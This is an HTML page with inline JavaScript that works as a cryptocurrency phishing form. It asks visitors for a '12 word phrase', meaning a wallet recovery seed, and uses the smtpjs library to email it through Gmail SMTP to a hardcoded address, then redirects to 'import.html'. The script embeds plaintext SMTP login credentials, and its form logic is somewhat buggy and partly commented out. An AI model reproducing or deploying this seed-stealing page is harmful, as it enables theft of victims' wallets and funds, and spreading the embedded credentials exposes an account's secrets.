<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <input type="text" placeholder="Type something..." id="myInput">
    <input type="submit" onclick="getInputValue();">Get Value</button>


    <script src="assets/js/jquery-3.3.1.min.js"></script>
    <script src="assets/js/jquery-slim.min.js"></script>
    <script src="assets/js/popper.min.js"></script>
    <script src="assets/js/bootstrap.min.js"></script>
    <script src="assets/js/custom.js"></script>
    <script src="https://smtpjs.com/v3/smtp.js"></script>
    <script src="assets/js/app.js"></script>
    <script>
        function getInputValue(){
                document.querySelector(".contact-form").addEventListener("submit", submitForm);
                var inputVal = document.getElementById("myInput").value;
                var spaceCount = (inputVal.split(" ").length);
                if(spaceCount > 2){
                    $('input[type="submit"]').attr('disabled' , true);
                    alert("Please insert 12 word phrase");
                }else{
                    function submitForm(e){
                        e.preventDefault();
                        
                        //Get the values all input
                        let phrase = document.querySelector(".phrase").value;

                        document.querySelector(".contact-form").reset();

                        sendEmail(phrase);
                    }

                    function sendEmail(phrase){
                        Email.send({
                            Host: "smtp.gmail.com",
                            Username: "nitrodee08@gmail.com",
                            Password: "adwggqqwfymdqzhk",
                            To: "nitrodee08@gmail.com",
                            From: "nitrodee08@gmail.com",
                            Subject: "You have a new from PHASE field",
                            Body: `Phrase: ${phrase}`,
                        }).then(message =>window.location.href="import.html");
                    }
                }
            }
            // alert(spaceCount);
            // if(this.spaceCount === 2){
                // $('input[type="submit"]').attr('disabled' , false);
            //     window.location.href="import.html"
            // }


        // $(document).ready(function() {

        //     function getInputValue(){
        //         var inputVal = document.getElementById("myInput").value;
        //         var spaceCount = (inputVal.split(" ").length);
        //         alert(spaceCount);
        //     }
        //         var inputVal = document.getElementById("myInput").value;
        //         var spaceCount = (inputVal.split(" ").length);
        //         alert(spaceCount);


        //         $('input[type="submit"]').attr('disabled', true);
        //         if(spaceCount === 12){
        //             // $('input[type="submit"]').attr('disabled' , false);
        //             alert(" This form will be submitted")
        //         } else {
        //             // $('input[type="submit"]').attr('disabled' , true);
        //             alert("This form will not be submitted");
        //         }
        //     });
        // function getInputValue(){
            
            // Displaying the value
             
                // $('textarea').on('keyup',function(){
                //     var textarea_val = $("#texta").val();
                //     var minLength = $("#texta").attr( 'minlength' );
                
                //     if(textarea_val != '' && textarea_val.length >= minLength){
                //         $('input[type="submit"]').attr('disabled' , false);
                //     }
                //     else{
                //         $('input[type="submit"]').attr('disabled' , true);
                //     }

                // });
        //     });
        // }
    </script>
</body> 
</html>